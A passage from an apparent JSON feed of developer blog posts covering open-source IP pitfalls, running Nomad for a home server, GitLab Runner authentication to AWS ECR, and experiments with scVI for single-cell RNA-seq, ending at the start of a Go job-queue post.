open source, some licenses may require making your code open source as well, and some require attribution.\nCopying code snippets from GitHub or other publicly available places\nIf you found some code on GitHub or any publicly accessible place, you shouldn’t assume that the code is open source unless a license is explicitly given. For instance, for projects without an explicit license on GitHub, all you can do is read the code and fork it; you aren’t supposed to change the code.\nForking open source projects without changing trademarks\nEven when an open source project is licensed under a permissive open source license, that doesn’t grant you the use of its trademark for redistribution. For example, you can’t simply fork MySQL and sell it as MySQL.\nOpen sourcing stuff without proper planning\nWhen you are open sourcing a certain part of your codebase, you must have a plan for what to do with contributions. For instance, when you release a component of your codebase as open source and someone from the community sends a pull request which you merge into your repo, by default the person who contributed holds the copyright of that code; the company can only use that code as per the license given in the repository. A CLA can be used as a workaround for this.\nDo you have more examples? Feel free to comment below.\nWe covered the general IP concepts and their significance in open source. I am not a lawyer and this blog post is not a legal opinion, so talk to your lawyer before making legal decisions.",[],{"slug":2108,"title":2109,"link":2110,"pubDate":2111,"contentSnippet":2112,"tags":2113,"maintainerName":94,"maintainerUsername":95,"maintainerPhoto":96,"feedUrl":97},"home-server-nomad","Running Nomad for home server","https:\u002F\u002Fmrkaran.dev\u002Fposts\u002Fhome-server-nomad\u002F","2021-02-14T02:40:55.000Z","It’s been a long time since I’ve written a post on Hydra (my home server). I use Hydra as a testbed to learn new tools and workflows, and it just gives me joy to self-host applications while learning something in return.\nHistory#\nA brief history of how Hydra’s setup evolved over time:\n2019:\nA pretty minimal K3s setup deployed on 2 RPi4 nodes.
I couldn’t continue with this setup because:\n\nSome of the apps didn’t have ARM-based images (this was 2019, pre M1 hype era).\nDidn’t want to risk deploying persistent workloads on RPi.\nA lot of tooling to deploy workloads was missing (storing env variables, for example).\nIt was so boring to write YAML (that I also did at work). Didn’t give me joy.\n2020 First Half:\nRPi 2x Nodes + K3s + DO Droplet. Tailscale for networking.\n\nThis was a considerable step up from the previous setup. I deployed a DO node and added node labels to deploy persistent workloads on the DO node only.\nI used my own tooling Kubekutr + Kustomize, which helped with version control of my configs.\nTook quite a bit of time to onboard new services. Got lazy, didn’t host much apart from the initial 3-4 applications.\nWriting long YAMLs. No joy.\n2020 Second Half:\nSingle node on DO. Terraform for deploying Docker containers.\n\nI believe the third iteration nailed it for me. I kept the setup super simple and used Terraform for deploying workloads as Docker containers.\nUsed Terraform extensively for setting up the node, Cloudflare records, and DO firewall rules.\nTime to onboard new services reduced from a couple of hours to a few minutes. This was a huge win for me. I deployed around 10-15 new services to try out on the server directly.\nWriting HCL is actually a much better experience than YAML.\nWhy Nomad#\n\nAround a month back, Kailash had asked about feedback on Nomad. We at Zerodha (India’s largest stock broker) are evaluating it to migrate our services to Nomad from Kubernetes (more on this later). It was almost 2 years since I last saw Nomad, so it was definitely worth re-evaluating (especially since it hit 1.0 recently). I wanted to try out Nomad to answer a personal curiosity: What does it do differently than Kubernetes? No better way than actually getting hands dirty, right?!\nAfter following the brief tutorials from the official website, I felt confident enough to try it for actual workloads. In my previous setup, I was hosting quite a few applications (Pihole, Gitea, Grafana etc) and thought it’d be a nice way to learn how Nomad works by deploying the same services in a Nomad cluster. And I came in with zero expectations; I already had a nice setup which was reliable and running for me. My experience with a local Nomad cluster was joyful; I was able to quickly go from 0->1 in less than 30 minutes. This, BTW, is a strong sign of how easy Nomad is to get started with as compared to K8s. The sheer amount of different concepts you’ve to register in your mind before you can even deploy a single container in a K8s cluster is bizarre. Nomad takes the easy way out here and simplifies the concepts for developers into just three things:\njob\n  \\_ group\n        \\_ task\nJob: A job is a collection of different groups. The job is where the constraints for the type of scheduler, update strategies and ACLs are placed.\nGroup: A group is a collection of different tasks. A group is always executed on the same Nomad client node. You’ll want to use groups for use-cases like a logging sidecar, reverse proxies etc.\nTask: The atomic unit of work. A task in Nomad can be running a container\u002Fbinary\u002FJava VM etc., defining the mount points, env variables, ports to be exposed etc.\nIf you’re coming from K8s, you can think of a Task as a Pod and a Group as a ReplicaSet. There’s no equivalent to Job in K8s. BUT! The coolest part?
You don’t have to familiarise yourself with all the different types of Replicasets (Deployments, Daemonsets, Statefulsets) and the different ways of configuring them.\nWant to turn a normal job into a periodic job in Nomad? Simply add the following block to your existing Job:\nperiodic {\n  cron = \"@daily\"\n}\nYou want to make a service run on all Nomad nodes – the equivalent of a Daemonset in K8s? Simply make the following change to your existing job (the system scheduler runs the job on every eligible client node):\n-type=\"service\"\n+type=\"system\"\nYou see, this is what I mean by the focus on UX. There are many, many such examples which will leave a nice smile on your face if you’re coming from a K8s background.\nI’d recommend reading Internal Architecture of Nomad if you want to understand this in-depth.\nArchitecture#\nTech stack for Hydra:\nTailscale VPN: Serves as a mesh layer between my laptop\u002Fmobile and the DO server. Useful for exposing internal services.\nCaddy for reverse proxying and automatic SSL setup for all services. I run 2 instances of Caddy:\n\nInternal: Listens on the Tailscale network interface. Reverse proxies all private services.\nPublic: Listens on DO’s public IPv4 network interface. Reverse proxies all public-facing services.\nTerraform: Primary component to have IaC (Infra as Code). Modules to manage:\n\nCloudflare DNS Zone and Records\nDO Droplet, Firewall rules, SSH Keys, Floating IPs etc.\nNomad Jobs. Used for running workloads after templating env variables and config files in Nomad job files.\nComplexity of Nomad vs Kubernetes#\n\nNomad shines because it follows the UNIX philosophy of “Make each program do one thing well”. To put it simply, Nomad is just a workload orchestrator. It is only concerned with things like bin packing and scheduling decisions.\nIf you’re running heterogeneous workloads, running a server (or a set of servers) quickly becomes expensive. Hence orchestrators tend to make sense in this context. They tend to save costs by making it efficient to run a vast variety of workloads. This is really all an orchestrator has to do.\nNomad doesn’t interfere in your DNS setup, Service Discovery, secrets management mechanisms or pretty much anything else. If you read some of the posts at Kubernetes Failure Stories, the most common reason for outages is Networking (DNS, ndots etc). A lot of marketing around K8s never talks about these things.\nI always maintain “Day 0 is easy, Day N is the real test of your skills”. Anyone can deploy a workload to a K8s cluster; it’s always the Day N operations – debugging networking drops, mysterious container restarts, proper resource allocations and other such complex issues – that require real skills and effort. It’s not as easy as kubectl apply -f and my primary gripe is with people who miss out on this in their “marketing” pitches (obvious!).\nWhen to use Nomad#\nNomad hits the sweet spot of being operationally easy and functional. Nomad is a great choice if you want to:\nRun not just containers but other forms of workloads.\nIncrease developer productivity by making it easier to deploy\u002Fonboard new services.\nGet a consistent deployment experience by testing the deployments locally.\n(Not joking) You are tired of running Helm charts or writing large YAML manifests. The config syntax for Nomad jobs is human friendly and easy to grasp.\nNomad is available as a single binary. If you want to try it locally, all you need is sudo nomad agent -dev and you’ll have a Nomad Server and Client running in dev mode along with a UI. 
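That dev agent also exposes Nomad’s HTTP API (port 4646 by default), which is what the UI itself talks to. As a rough sketch – assuming a local dev agent with no ACLs or TLS – you can list whatever is running with a few lines of Python:

import requests

NOMAD_ADDR = "http://localhost:4646"  # default address for a local dev agent

def list_jobs():
    resp = requests.get(f"{NOMAD_ADDR}/v1/jobs", timeout=5)
    resp.raise_for_status()
    # Each job stub carries its ID, Type (service/batch/system) and Status.
    for job in resp.json():
        print(job["ID"], job["Type"], job["Status"])

list_jobs()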
This makes it easy for the developers to test out the deployments locally because there’s very little configuration difference between this and production deployment. Not to forget it’s super easy to self-host Nomad clusters. I’m yet to meet anyone who self hosts K8s clusters in production without a dedicated team babysitting it always.\nOnce you eliminate the “blackbox” components from your stack, life becomes easier for everyone.\nWhen to not use Nomad#\nIf you’re relying on custom controllers and operators. Operator Pattern is a new way of managing large complex distributed systems (like databases, job queues etc). There are a lot of community built operators which help in reducing the effort to run these services. However, all of these are tied deeply into the “Kubernetes” ecosystem. If you find yourself running any of such operators, it’ll be tough (not impossible) to translate the same in Nomad ecosystem.\nI genuinely cannot think of any other reason to not use Nomad!\nPractical Scenarios#\nSince I migrated a couple of workloads from my DO docker containers setup to Nomad, I’d demonstrate a few use cases which might be helpful if you want to start migrating your services to Nomad\nAccessing a Web service with Reverse Proxy#\nContext: I’m running Caddy as a reverse proxy for all the services. Since we discussed earlier, Nomad only is concerned about scheduling, so how exactly do you do Service Discovery? You need Consul (or something like Consul, Nomad has no hard restrictions) to register a service name with it’s IP Address. Here’s how you can do that:\nIn the .task section of your Nomad job spec, you need to register the service name with the port you’re registering and additional tags as metadata (optional):\nservice {\n  name = \"gitea-web\"\n  tags = [\"gitea\", \"web\"]\n  port = \"http\"\n}\nNomad’s template uses consul-template behind the scenes. This is a small utility which continuously watches for Consul\u002FVault keys and provides the ability to reload\u002Frestart your workloads if any of those keys change. It can also be used to discover the address of the service registered in Consul. So here’s an example of Caddyfile using Consul Template functions to pull the IP address of the upstream gitea-web service:\ngit.mrkaran.dev {\n    {{ range service \"gitea-web\" }}\n    reverse_proxy {{ .Address }}:{{ .Port }}\n    {{ end }}\n}\nWhen a job is submitted to Nomad, a rendered template is mounted inside the container. You can define actions on what to do when the values change. For eg on a redeployment of Gitea container, the address will most likely change. We’d like Caddy to automatically restart with the new address configured in the Caddyfile in that case:\ntemplate {\n  data = \u003C\u003CEOF\n${caddyfile_public}\nEOF\n\n  destination = \"configs\u002FCaddyfile\" # Rendered template.\n\n  change_mode = \"restart\"\n}\nUsing change_mode we can either send a signal or restart the task altogether.\nBinding to different network interfaces#\nI run a public instance of Gitea but I wanted to restrict the SSH access only to my Tailscale network. 
Nomad has an interesting feature host_network which lets you bind different ports of a task on different network interfaces.\nnetwork {\n  port \"http\" {\n    to = 3000\n  }\n\n  port \"ssh\" {\n    to = 22\n\n    # Need a static assignment for SSH ops.\n    static = 4222\n\n    # SSH port on the host only exposed to Tailscale IP.\n    host_network = \"tailscale\"\n  }\n}\nTemplating Env Variables#\nNOTE: This is not recommended for production.\nNomad doesn’t have any templating functionalities, so all the config must be sourced from Consul and secrets should be sourced from Vault. However in the time constraint I had, I wanted to understand Nomad and Consul better and use Vault at a later stage. I needed a way to interpolate the env variables. This is where Terraform comes into picture:\nresource \"nomad_job\" \"app\" {\n  jobspec = templatefile(\"${path.module}\u002Fconf\u002Fshynet.nomad\", {\n    shynet_django_secret_key   = var.shynet_django_secret_key,\n    shynet_postgresql_password = var.shynet_postgresql_password\n  })\n  hcl2 {\n    enabled = true\n  }\n}\nWe can pass the variables from Terraform (which can be sourced by TF_VAR_ in your local env) to the Nomad job spec. Inside the job spec we can use env to make it available to our task:\nenv {\n  DB_PASSWORD              = \"${shynet_postgresql_password}\"\n  DJANGO_SECRET_KEY        = \"${shynet_django_secret_key}\"\n}\nRunning a backup job on the host#\nI use restic to take periodic backups of my server and upload to Backblaze B2. Since Nomad supports running tasks as a different isolated environment (chroot) using exec driver and even without isolation using raw_exec driver, I wanted to give that a try. I’ve to resort using raw_exec driver here because \u002Fdata file path on my host was not available to the chroot’ed environment.\njob \"restic\" {\n  datacenters = [\"hydra\"]\n  type        = \"batch\"\n\n  periodic {\n    cron             = \"0 3 * * *\"\n    time_zone        = \"Asia\u002FKolkata\"\n    prohibit_overlap = true\n  }\n  ...\n  task \"backup\" {\n\t  driver = \"raw_exec\"\n\n\t  config {\n\t\t# Since `\u002Fdata` is owned by `root`, restic needs to be spawned as `root`. \n\n\t\t# `raw_exec` spawns the process with which `nomad` client is running (`root` i.e.).\n\t\tcommand = \"$${NOMAD_TASK_DIR}\u002Frestic_backup.sh\"\n\t  }\n  }\n  ...\n}\nYou can follow the rest of the config here.\nScope of Improvements#\nNomad has been an absolute joy to work with. However, I’ve spotted a few rough edge cases which I believe one should be aware of:\nhost_network property sometimes gets ignored when doing a modification to service. I’ve opened an issue upstream but looks like other people are facing similar behaviours here and here.\nhost_network as of present cannot bind to a floating IP address (DigitalOcean\u002FGCP etc). I’ve to resort to using my droplet’s public IPv4 address for now.\nI tried using Consul Connect (service mesh with mTLS) but looks like again because of host_network, I’m unable to use it.\nNomad CLI can definitely be improved for a much more consistent experience. I particularly missed using kubectl when using nomad.\nThat apart, I ended up sending a PR to upstream addressing a CLI arg ordering issue.\nGotchas:#\nOn a Nomad server already bootstrapped, if you try changing server.bind_addr, it won’t have any effect. 
I almost pulled my hair debugging this, ultimately deleting the data_dir of the server resolved the issue for me.\nI’m running DB and the App together as a single “group” in my setup configs. Don’t do this in production. Whenever you restart the job, the group will restart both the containers. The side effect of this is pretty interesting: Since we use Consul to fetch the DB Host, the app may start before the DB boots up and registers its new address with Consul. I will fix the dependency in a future version but since I’m running fewer workloads and there are automatic retries, it’s okay enough for me to keep it like this.\nCommunity#\nNomad’s community is pretty small compared to Kubernetes. However, the folks are super responsive on Gitter, Discourse and Github Issues. A few noteworthy mentions:\n@the-maldridge helped me with my doubts in Gitter.\n@tgross who is super responsive on Github issues and does an excellent job at housekeeping the issues.\n@shantanugadgil who is also pretty active in the community.\nNomad’s ecosystem is still in its nascent stage and I believe there are a lot of contribution opportunities for folks interested in Golang, Ops, Distributed Systems to contribute to Nomad. The codebase of Nomad is approachable and there are quite a few key areas which can be contributed to:\nDocs: More examples, practical use cases.\nNomad Job files: There are many helm charts available to follow best practices. Something similar in Nomad will definitely be interesting.\nNomad Gotchas: Since K8s is widely used and has a much larger adoption, it’s only natural that the failure stories of K8s are highlighted a lot. Nomad being a pretty smaller community, we need more debugging and “things that went wrong” reference materials. You learn more from failures than 101 setup guides :)\nFinal Thoughts#\nI think I’m sold on Nomad. I’ve used Kubernetes in prod for 2 years but if you were to ask me to write a Deployment spec from scratch (without Googling\u002Fkubectl help) I won’t be able to. After writing Nomad configs, I just can’t think of the sheer amount of boilerplate that K8s requires to get an application running.\nNomad is also a simpler piece to keep in your tech stack. Sometimes it’s best to keep things simple when you don’t really achieve any benefits from the complexity.\nNomad offers less than Kubernetes and it’s a feature, not a bug.\nFin!\nDiscussions#\nHackerNews\nLobster\nTwitter",[],{"slug":2115,"title":2116,"link":2117,"pubDate":2118,"contentSnippet":2119,"tags":2120,"maintainerName":202,"maintainerUsername":203,"maintainerPhoto":204,"feedUrl":205},"the-atmanirbhartha-of-open-source-software","The \"Atmanirbharta\" of open source software","https:\u002F\u002Fnadh.in\u002Fblog\u002Fthe-atmanirbhartha-of-open-source-software\u002F","Sat, 30 Jan 2021 00:00:00 +0000","In the Indian startup circles, Atmanirbhar (self-reliance) is the word of the year. Technology startups of all shapes and sizes, “unicorns” and non-unicorns have incorporated the tri colour and the Made in India label into their brand messaging and advertising campaigns—marketing prowess and valuations built on top of rapid innovation enabled by Free and Open Source Software (FOSS) created all over the world by countless programmers volunteering their time and effort writing code for everyone to solve problems and build enterprises. 
Linux, the quintessential example of FOSS, if quantified, would turn out to have created trillions of dollars in value for humanity.",[],{"slug":2122,"title":2123,"link":2124,"pubDate":2125,"contentSnippet":2126,"tags":2127,"maintainerName":94,"maintainerUsername":95,"maintainerPhoto":96,"feedUrl":97},"gitlab-runner-ecr","Setup Gitlab Runner with AWS ECR","https:\u002F\u002Fmrkaran.dev\u002Fposts\u002Fgitlab-runner-ecr\u002F","2021-01-29T02:40:55.000Z","There are some things you expect to just work. Sadly trying to make Gitlab Runner with AWS ECR turned out to be quite a daunting task and the little documentation in this area doesn’t help. There’s even a 4 years old issue and everyone there is echoing the sentiment that this is unnecessarily a lot harder than it should have been.\nAnyway, since I spent a lot of time figuring out how to make a Private Registry work with a cross-account ECR, I’m documenting these steps hoping it’ll help someone someday :).\nThe Problem#\nThere are mainly 2 seemingly same but different problems when it comes to using ECR. Let’s discuss both of them separately:\nPulling a private image from ECR using the Docker Executor. For eg, if your gitlab-ci.yml looks like:\ntest-pull:\n  image: $PRIVATE_ECR_IMAGE\n  script:\n    - echo \"Hello World!\"\nIn this case, the Docker Executor needs to be “authenticated” to AWS ECR so that it can pull $PRIVATE_ECR_IMAGE.\nPulling a private image inside the job. For eg, if you’re using Kaniko:\ndocker-build:\n  image: gcr.io\u002Fkaniko-project\u002Fexecutor:debug\n  script:\n    - |\n      \u002Fkaniko ...\n      # Inside this step, we use a PRIVATE_ECR_IMAGE defined in our `Dockerfile`.\nIn this case, Kaniko needs to be “authenticated” to AWS ECR so that it can pull $PRIVATE_ECR_IMAGE.\nNOTE I prefer Kaniko over DIND as it is faster, doesn’t require running the privileged container, caching is simplified, and is in general a lot simpler to setup.\nThe Solution#\nSo, for the first case, where you want to authenticate the Docker Executor to AWS ECR, you’ll need 2 things:\nSetup DOCKER_AUTH_CONFIG environment variable to  { \"credsStore\": \"ecr-login\" } in the config.toml of the runner. For eg:\n[[runners]]\n  name = \"Test\"\n  url = \"https:\u002F\u002Fgitlab.internal\u002F\"\n  token = \"REDACTED\"\n  executor = \"docker\"\n  environment = [\"DOCKER_AUTH_CONFIG={ \\\"credsStore\\\": \\\"ecr-login\\\" }\"]\nNow, we’ve specified the Credential Store for Docker, but we don’t have this binary docker-credential-ecr-login in our runner. AWS provides amazon-ecr-credential-helper which is a neat way of automatically authenticating with AWS ECR based on your Access Keys\u002FIAM role. What does automatic mean here? So, the normal docker login is a basic auth command, where if you’ve to log in to ECR, you need to do something like:\naws ecr get-login-password --region region | docker login --username AWS --password-stdin aws_account_id.dkr.ecr.region.amazonaws.com\nThis is problematic because the authorization token is valid for 12 hours. Further, you’ve to log in to multiple registry IDs separately. Managing this is a nightmare, so Docker instead of just relying on Basic Auth, came up with a neat mechanism: docker-credential-helpers. This allows you to keep your secret tokens in your Keystore. A new credential helper can be written in Go which implements the credentials.Helper interface. 
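The handshake between Docker and a helper is worth seeing once: Docker invokes the binary named docker-credential-&lt;store&gt; with a verb (get, store or erase) as the first argument, writes the registry URL to stdin, and expects a small JSON object on stdout. Here is a toy helper in Python, purely to illustrate that protocol (real helpers such as docker-credential-ecr-login are Go binaries that fetch a fresh token instead of the placeholder below):

#!/usr/bin/env python3
import json
import sys

def main():
    verb = sys.argv[1] if len(sys.argv) > 1 else ""
    if verb == "get":
        # Docker writes the registry URL on stdin.
        server_url = sys.stdin.read().strip()
        # For ECR the username is always "AWS"; a real helper would fetch a
        # fresh authorization token here instead of this placeholder value.
        print(json.dumps({
            "ServerURL": server_url,
            "Username": "AWS",
            "Secret": "placeholder-token",
        }))
    # store/erase would be no-ops for a read-only helper like this one.

if __name__ == "__main__":
    main()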
This is what amazon-ecr-credential-helper does by offering various ways like AWS IAM Roles, Assumed Roles, Access Keys, etc to authenticate with ECR.\nThis is where I stumbled the most. I downloaded the binary from the Github Releases but this binary is statically compiled with muslc libraries.\nHowever gitlab\u002Fgitlab-runner is based on the ubuntu docker image, so the above binary never worked. The strangest thing was the unhelpful error message that sh returned as explained in this post.\nTo make things easier, I baked my own gitlab-runner image with the above binary compiled inside the image\nusing go get:\nFROM ubuntu:20.04 AS build\nENV DEBIAN_FRONTEND=noninteractive \nRUN : \\\n && apt-get update \\\n && apt-get install --no-install-recommends -y git golang-go ca-certificates \\\n && rm -rf \u002Fvar\u002Flib\u002Fapt\u002Flists\u002F* \\\n;\nRUN go get -u github.com\u002Fawslabs\u002Famazon-ecr-credential-helper\u002Fecr-login\u002Fcli\u002Fdocker-credential-ecr-login\nWORKDIR \u002Fbuild\nRUN mv \u002Froot\u002Fgo\u002Fbin\u002Fdocker-credential-ecr-login .\n\nFROM gitlab\u002Fgitlab-runner:v13.8.0 AS deploy\nCOPY --from=build \u002Fbuild\u002Fdocker-credential-ecr-login \u002Fusr\u002Flocal\u002Fbin\u002Fdocker-credential-ecr-login\nThe above image bakes in the docker-credential-ecr-login binary and also puts it under \u002Fusr\u002Flocal\u002Fbin so it’ll be available under $PATH to the Docker engine.\nWith the above 2 things, if the runner’s server (EC2 instance\u002FK8s pod) has access to the ECR image, it should be able to pull.\nNow coming to the 2nd problem, where we wanted kaniko to authenticate to ECR, things are a bit simpler:\nKaniko comes with docker-credential-ecr-login baked in. All you need to do is add the following to ~\u002F.docker\u002Fconfig.json as explained here.\n{ \"credsStore\": \"ecr-login\" }\nNext, we need to mount the AWS Credentials to Kaniko’s image so that it can use AWS SDK to perform a login to ECR. We do that by using volumes of the runner:\n[runners.docker]\nvolumes = [\"\u002Fhome\u002Fubuntu\u002Frunners\u002Ftest\u002Faws-credentials:\u002Froot\u002F.aws\u002Fcredentials:ro\"]\nThis mounts the aws-credentials file from the host inside the container which the runner spawned (kaniko in this case).\nA sample aws-credentials file if you’re using a cross-account access can look like:\n[default]\nrole_arn=arn:aws:iam::ACCOUNT_ID:role\u002Fassume-role-{{ROLE_NAME}}\ncredential_source=Ec2InstanceMetadata\nregion=ap-south-1\nYou can put in your normal AWS Keys or leave them blank if you want to use your IAM Role. 
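Before wiring all of this into the runner, it can save time to verify that the credentials (or the assumed role) can actually mint an ECR token. A small sanity-check sketch using boto3 – the region matches the examples above, adjust it to your account:

import base64
import boto3

# Uses the same credential chain the helper will use
# (~/.aws/credentials, instance metadata, assumed roles, etc.).
client = boto3.client("ecr", region_name="ap-south-1")
resp = client.get_authorization_token()
auth = resp["authorizationData"][0]

# The token is base64("AWS:<password>") and is valid for 12 hours.
user, _, password = base64.b64decode(auth["authorizationToken"]).decode().partition(":")
print("registry:", auth["proxyEndpoint"])
print("user:", user, "| got token:", bool(password))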
By mounting the AWS Credentials inside Kaniko’s container, you can authenticate to cross-account ECRs as well (once you set up the whole assumed-role\u002Ftrusted entities flow).\nSample Runner#\nIf you want to take a look at what the complete flow looks like:\nStart the Runner service using docker-compose:\nversion: '3.7'\n\nservices:\n\n  test:\n    # As explained above, this image has `docker-credential-ecr-login` baked in.\n    image: {{ACCOUNT_ID}}.dkr.ecr.ap-south-1.amazonaws.com\u002Fcustom\u002Fgitlab-runner:13.8.0\n    restart: always\n    volumes:\n      # Automatically created; config.toml.\n      - '.\u002Ftest\u002Frunner-config:\u002Fetc\u002Fgitlab-runner'\n      # Mount AWS Credentials for Docker Executor to authenticate.\n      - '.\u002Ftest\u002Faws-credentials:\u002Froot\u002F.aws\u002Fcredentials:ro'\n      # Mount Docker Socket so that executor can communicate with it.\n      - '\u002Fvar\u002Frun\u002Fdocker.sock:\u002Fvar\u002Frun\u002Fdocker.sock'\nRegister a new runner:\ndocker-compose exec test register\nFill in the basic info and edit .\u002Ftest\u002Frunner-config.toml with the following options:\n[[runners]]\n  name = \"Test\"\n  executor = \"docker\"\n  environment = [\"DOCKER_AUTH_CONFIG={ \\\"credsStore\\\": \\\"ecr-login\\\" }\"]\n  [runners.docker]\n    volumes = [\"\u002Fhome\u002Fubuntu\u002Frunners\u002Ftest\u002Faws-credentials:\u002Froot\u002F.aws\u002Fcredentials:ro\"]\nConclusion#\nHonestly, this was a lot of trial and error to figure out how to use private images with Gitlab. Some important links and references that helped me figure this out:\nhttps:\u002F\u002Fgitlab.com\u002Fbmares\u002Fgitlab-runner-ecr-auth-example\u002F\nhttps:\u002F\u002Fgitlab.com\u002Fgitlab-org\u002Fgitlab-runner\u002F-\u002Fissues\u002F1583#note_84649153\nFin!",[],{"slug":2129,"title":2130,"link":2131,"pubDate":2132,"contentSnippet":2133,"tags":2134,"maintainerName":982,"maintainerUsername":983,"maintainerPhoto":984,"feedUrl":985},"scvi","Experiments with scVI","https:\u002F\u002Fsaket-choudhary.me\u002Fblog\u002F2020\u002F12\u002F27\u002Fscvi\u002F","2020-12-26T18:30:00.000Z","scvi-tools exists as a suite of tools for performing dimensionality reduction, data harmonization, and differential expression. One key advantage of using scvi-tools is that it inherently supports loading and training data in mini-batches and hence is practically infinitely scalable (Lopez et al., 2018).\nscvi-tools uses generative modeling to model counts originating from a scRNA-seq experiment, with different underlying models catering to different kinds of experiments. “Generative modeling” is a broad term that implies models of distributions $P(X)$, defined over some collection of datapoints $X$ that exist in a high dimensional space. In scRNA-seq, each datapoint corresponds to a cell $c$ which has a multidimensional vector $X_{c,g} \\in \\mathcal{R}^{20000}$ containing read counts or UMIs of 20000 genes. A scRNA-seq dataset contains not one but a few thousand, if not millions, of cells.\nThe generative model’s task is to capture the underlying representation of these cells. 
\n“Representation” here is a loose term, but more formally: given a $\\text{gene} \\times \\text{cell}$ matrix whose distribution $P_{\\text{truth}}(X)$ is unknown, the generative model tries to learn a distribution $P(X)$ which is as close to $P_{\\text{truth}}(X)$ as possible.\nIn order to obtain $P(X)$, the model should be able to exploit the underlying structure in the data.\nNeural networks are powerful function approximators given their ability to capture non-linearities. Variational autoencoders utilize neural networks to build generative models that can approximate $P_{\\text{truth}}(X)$ in a decently quick fashion. The reason this works is that any $d$ dimensional distribution can be approximated by starting with $d$ gaussian random variables and passing them through a complicated function (Devroye, 1986). A famous example of this is generating a 2D circle from a 2D gaussian blob.\n  Figure 1. \n    A 2D gaussian blob can be passed through a sufficiently complicated function $g(z) = \\frac{z}{\\alpha} + \\frac{z}{||z||}$ to obtain a 2D ring.\nscvi-tools also starts from a gaussian random variable and propagates it through its various layers such that the output count for a gene in a particular cell is close to its observed value. It does this over four main steps:\nGenerate a gaussian\nPass the gaussian through a neural network to approximate gene-cell proportions ($\\rho_{g,c}$)\nGenerate a count $y_{c,g}$ for each gene-cell pair using the estimated proportion from step 2 and the total sequencing depth, along with an estimated dispersion $\\phi_g$.\nCalculate the reconstruction error between the generated count $y_{c,g}$ and the observed count $x_{c,g}$\nThe aim is to minimize the reconstruction error in step 4 by optimizing the neural network weights and the estimated parameters $\\rho_{c,g}$ and $\\phi_g$.\n\\begin{aligned}\n    {\\color{purple}z_c} &\\sim \\mathcal{N}(0,I) & \\text{\\color{purple}Cell embedding} \\\\\n    {\\color{red}\\rho_{g,c}} &\\sim \\text{softmax}(f_w(z_c)) & \\text{\\color{red}Normalized expression} \\\\\n    y_{c,g} &\\sim \\text{NB}({\\color{blue} l_c} {\\color{red}\\rho_{c,g}}, \\phi_g) & \\text{Observed counts}\n\\end{aligned}\nThe total sequencing depth for a cell can also be learned by the network inherently, but the latest version (0.8.0) of scVI supports using the observed library size. I started using observed library sizes before it became part of the implementation. The training time is faster, and in my limited testing the downstream clustering results look slightly better with the observed library size, though that could also be due to other reasons.\nThe latent distribution $Z$ thus learned is a reduced dimensional latent representation of the data. I will use the PBMC3k dataset (https:\u002F\u002Fsupport.10xgenomics.com\u002Fsingle-cell-gene-expression\u002Fdatasets\u002F1.1.0\u002Fpbmc3k) for all the analysis here. 
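For reference, getting to that latent representation takes only a few lines. A rough sketch using scvi-tools and scanpy – the setup call has moved around between scvi-tools releases (this matches the ~0.8-era API), and the data path is purely illustrative:

import scanpy as sc
import scvi

# Load the 10x PBMC3k count matrix.
adata = sc.read_10x_mtx("pbmc3k/filtered_gene_bc_matrices/hg19/")

scvi.data.setup_anndata(adata)   # register the counts with scvi-tools
model = scvi.model.SCVI(adata)   # the VAE described above
model.train()

# The latent Z: one low-dimensional vector per cell.
adata.obsm["X_scVI"] = model.get_latent_representation()

# Neighbours/UMAP on the latent space instead of PCA space.
sc.pp.neighbors(adata, use_rep="X_scVI")
sc.tl.umap(adata)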
We can do a UMAP visualization, and the clusters tend to match up pretty well with the ground truth, though there is possibility of improvement.\n  Figure 2.\n      UMAP on the latent representation learned by scVI on the PBMC3k dataset.\nNow that we have $P(Y)$ and access to all the intermediate values, we can do a ton of things. But the first thing would be to check if $P(Y)$ is indeed correct. One way of performing validity checks on this model is posterior predictive checks (PPC). I learned of PPCs through Richard McElreath’s Statistical Rethinking (McElreath, 2020), where they form an integral part of all his discussions.\nThe idea of a PPC is very simple: simulate replicate data from the learned model and compare it to the observed data. In a way you are using your data twice: once to learn the model, and then again to check the learned model against the same data. A better designed check would be done on a held-out dataset, but it is perfectly valid to test the model against the observations used to train it.\nThe simplest check for scRNA-seq counts is the mean-variance relationship. The simulated means and variances from the learned model should match those of the observed data on both a cell and a gene level.\nFigure 3. Comparison of generated against observed means, variances and mean-variance relationships.\nThe simulated mean-variance relationship aligns very well with the observed relationship.\nLet’s compare how the dispersion looks:\nFigure 4. Comparison of generated against observed dispersion.\nVariation with gene detection rate:\nFigure 5. Variation with gene detection rate.\nThe loss function used to infer the parameters minimizes the reconstruction loss between the generated counts $X$ and the observed counts $Y$.\nFigure 6. Reconstruction loss between generated and observed counts.\nOne thing I still need to wrap my head around is how informative the reconstruction error itself is. For example, a UMAP of this reconstruction error mimics that of the latent representation:\nFigure 7. UMAP of the reconstruction error.\n\nLopez, R., Regier, J., Cole, M. B., Jordan, M. I., & Yosef, N. (2018). Deep generative modeling for single-cell transcriptomics. Nature Methods, 15(12), 1053–1058.\nDevroye, L. (1986). Sample-based non-uniform random variate generation. Proceedings of the 18th Conference on Winter Simulation, 260–265.\nMcElreath, R. (2020). Statistical rethinking: A Bayesian course with examples in R and Stan. CRC Press.\nMa, S., Zhang, B., LaFave, L. M., Earl, A. S., Chiang, Z., Hu, Y., Ding, J., Brack, A., Kartha, V. K., Tay, T., & others. (2020). Chromatin potential identified by shared single-cell profiling of RNA and chromatin. Cell, 183(4), 1103–1116.",[],{"slug":2136,"title":2137,"link":2138,"pubDate":2139,"contentSnippet":2140,"tags":2141,"maintainerName":94,"maintainerUsername":95,"maintainerPhoto":96,"feedUrl":97},"job-queue-golang","Designing a simple Job Queue in Golang","https:\u002F\u002Fmrkaran.dev\u002Fposts\u002Fjob-queue-golang\u002F","2020-12-01T02:40:55.000Z","In this post we’ll see how to create a simple job queue in Golang. 
